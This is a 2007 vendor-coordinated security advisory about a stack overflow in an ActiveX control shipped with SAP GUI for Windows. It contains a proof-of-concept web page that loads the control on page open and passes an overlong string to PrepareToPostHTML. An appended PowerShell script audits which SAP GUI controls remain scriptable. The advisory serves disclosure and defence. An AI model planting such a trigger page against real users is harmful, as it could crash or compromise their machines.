<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<META content="MSHTML 6.00.2900.3132" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<DIV><FONT face=Arial size=2>=======<BR>Summary<BR>=======<BR>Name: EnjoySAP,
SAP GUI for Windows - Stack Overflow<BR>Release Date: 5 July
2007<BR>Reference: NGS00483<BR>Discover: Mark Litchfield &lt;<A
href="mailto:mark@ngssoftware.com">mark@ngssoftware.com</A>&gt;<BR>Vendor:
SAP<BR>Vendor Reference: SECRES-289<BR>Systems Affected: All Versions<BR>Risk:
High<BR>Status: Fixed</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=Arial
size=2>========<BR>TimeLine<BR>========<BR>Discovered: 4 January
2007<BR>Released: 19 January 2007<BR>Approved: 29 January 2007<BR>Reported: 11
January 2007<BR>Fixed: 18 May 2007<BR>Published: </FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=Arial
size=2>===========<BR>Description<BR>===========<BR>EnjoySAP, also known as Enjoy,
is the most popular SAP GUI used today. The<BR>latest version can be
obtained from <A
href="ftp://ftp.sap.com/pub/sapgui/win/">ftp://ftp.sap.com/pub/sapgui/win/</A></FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=Arial size=2>Installing EnjoySAP, which is very large for a
client (around 500MB), installs an astounding 1102 ActiveX
controls.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=Arial size=2>A relatively brief examination of these controls
found a large number of<BR>instances that would terminate the EnjoySAP process,
a number that<BR>could create files on the file system (there
unfortunately exists no<BR>ability to inject content into these created files)
and a number of<BR>buffer overruns.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=Arial size=2>=================<BR>Technical
Details<BR>=================<BR>Control - kweditcontrol.kwedit.1 (Marked Safe
For Scripting)</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=Arial size=2>Function - PrepareToPostHTML</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=Arial size=2>DLL Path - C:\Program
Files\SAP\FrontEnd\SapGui\kwedit.dll</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=Arial size=2>POC:</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=Arial size=2>&lt;HTML&gt;<BR>&lt;HEAD&gt;<BR>&lt;META
http-equiv=Content-Type content="text/html;
charset=windows-1252"&gt;<BR>&lt;SCRIPT
type=text/javascript&gt;<BR> <BR>function init()<BR>{<BR>var foo = "";
<BR> <BR>for(var icount = 0; icount &lt; 1060; icount++)
<BR>{ <BR> foo = foo +
"x";<BR>}<BR>var ngssoftware;<BR>ngssoftware = new
ActiveXObject("kweditcontrol.kwedit.1");<BR> <BR>ngssoftware["PrepareToPostHTML"](foo);<BR>}<BR>//--&gt;<BR>&lt;/SCRIPT&gt;<BR> <BR>&lt;/HEAD&gt;<BR>&lt;BODY
bgColor=#ffffff onload=init()&gt;<BR>&lt;/BODY&gt;&lt;/HTML&gt;</FONT></DIV>
<DIV> </DIV>
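<DIV><FONT face=Arial size=2>An added defensive check, not part of the original
advisory and not NGSSoftware or SAP code: the PowerShell below lists the COM
classes served from the SAP GUI directory in the DLL path above and reports
whether each is registered as safe for scripting and whether Internet Explorer's
kill bit is set for it. The $SapGuiDir default and the output column names are
assumptions; the category GUID and the 0x400 Compatibility Flags value are the
standard Windows ones.</FONT></DIV>

```powershell
# Added example: audit script exposure of COM classes installed by SAP GUI.
param(
    # Assumption: install directory taken from the advisory's DLL path.
    # On 64-bit Windows a 32-bit SAP GUI is normally under "Program Files (x86)".
    [string]$SapGuiDir = 'C:\Program Files\SAP\FrontEnd\SapGui'
)

# Component category "Controls that are safely scriptable".
$CatSafeForScripting = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'
# Compatibility Flags bit that stops Internet Explorer instantiating a control.
$KillBit = 0x400

# Native and 32-bit-on-64-bit registry views.
$views = @(
    @{ Classes = 'HKLM:\SOFTWARE\Classes\CLSID'
       Compat  = 'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility' },
    @{ Classes = 'HKLM:\SOFTWARE\WOW6432Node\Classes\CLSID'
       Compat  = 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility' }
)

$results = foreach ($v in $views) {
    if (-not (Test-Path -LiteralPath $v.Classes)) { continue }
    foreach ($key in Get-ChildItem -LiteralPath $v.Classes -ErrorAction SilentlyContinue) {
        # Keep only classes whose in-process server lives under the SAP GUI directory.
        $server = (Get-ItemProperty -LiteralPath "$($key.PSPath)\InprocServer32" -ErrorAction SilentlyContinue).'(default)'
        if (-not $server) { continue }
        $server = [Environment]::ExpandEnvironmentVariables($server).Trim('"')
        if (-not $server.StartsWith($SapGuiDir, [StringComparison]::OrdinalIgnoreCase)) { continue }

        $clsid = $key.PSChildName
        $flags = (Get-ItemProperty -LiteralPath "$($v.Compat)\$clsid" -ErrorAction SilentlyContinue).'Compatibility Flags'
        [pscustomobject]@{
            ProgID           = (Get-ItemProperty -LiteralPath "$($key.PSPath)\ProgID" -ErrorAction SilentlyContinue).'(default)'
            CLSID            = $clsid
            Server           = $server
            # Registry-declared only; a control can also assert safety at run time
            # through IObjectSafety, which this check cannot see.
            SafeForScripting = Test-Path -LiteralPath "$($key.PSPath)\Implemented Categories\$CatSafeForScripting"
            KillBitSet       = [bool]($flags -band $KillBit)
        }
    }
}

# Controls a web page can still script: declared safe and not kill-bitted.
$results | Where-Object { $_.SafeForScripting -and -not $_.KillBitSet } |
    Sort-Object ProgID | Format-Table -AutoSize
```

<DIV>&nbsp;</DIV>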
<DIV><FONT face=Arial size=2>===============<BR>Fix
Information<BR>===============<BR>Please ensure you are running the latest
version.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=Arial size=2>NGSSoftware Insight Security Research<BR><A
href="http://www.ngssoftware.com/">http://www.ngssoftware.com/</A><BR><A
href="http://www.databasesecurity.com/">http://www.databasesecurity.com/</A><BR><A
href="http://www.nextgenss.com/">http://www.nextgenss.com/</A><BR>+44(0)208 401
0070 <BR></FONT></DIV></BODY></HTML>